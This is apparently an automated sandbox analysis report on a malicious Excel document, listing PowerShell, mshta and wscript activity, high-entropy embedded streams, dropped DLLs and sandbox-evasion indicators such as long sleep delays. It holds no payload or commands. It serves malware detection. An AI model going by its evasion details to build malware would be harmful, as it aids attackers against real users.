                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: pi-77159.xlsStream path 'MBD0032224F/Package' entropy: 7.99627310248 (max. 8.0)
                    Source: pi-77159.xlsStream path 'Workbook' entropy: 7.99880669565 (max. 8.0)
                    Source: ~DFC4030D08E8153FBD.TMP.0.drStream path 'Package' entropy: 7.99440142372 (max. 8.0)
                    Source: 38630000.0.drStream path 'MBD0032224F/Package' entropy: 7.99440142372 (max. 8.0)
                    Source: 38630000.0.drStream path 'Workbook' entropy: 7.99804738159 (max. 8.0)

                    Malware Analysis System Evasion

                    barindex
                    Delayed program exit found
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_0040E54F Sleep,ExitProcess,34_2_0040E54F
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_000007FE89B03122 rdtsc 6_2_000007FE89B03122
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,34_2_004198C2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2143Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4234Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6014Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1395Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1419Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 403Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1533
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6507
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 723
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1774
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 880
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1868
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 857
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2156
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4730
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xijxxvat\xijxxvat.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qvgum1lr\qvgum1lr.dllJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeAPI coverage: 6.3 %
                    Source: C:\Windows\System32\mshta.exe TID: 3864Thread sleep time: -420000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3096Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3316Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep count: 6014 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3176Thread sleep count: 1395 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3260Thread sleep time: -120000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3256Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3144Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2148Thread sleep count: 1419 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264Thread sleep count: 403 > 30Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1372Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2176Thread sleep count: 1533 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2176Thread sleep count: 6507 > 30
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1944Thread sleep time: -60000s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1356Thread sleep time: -8301034833169293s >= -30000s
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1356Thread sleep time: -600000s >= -30000s
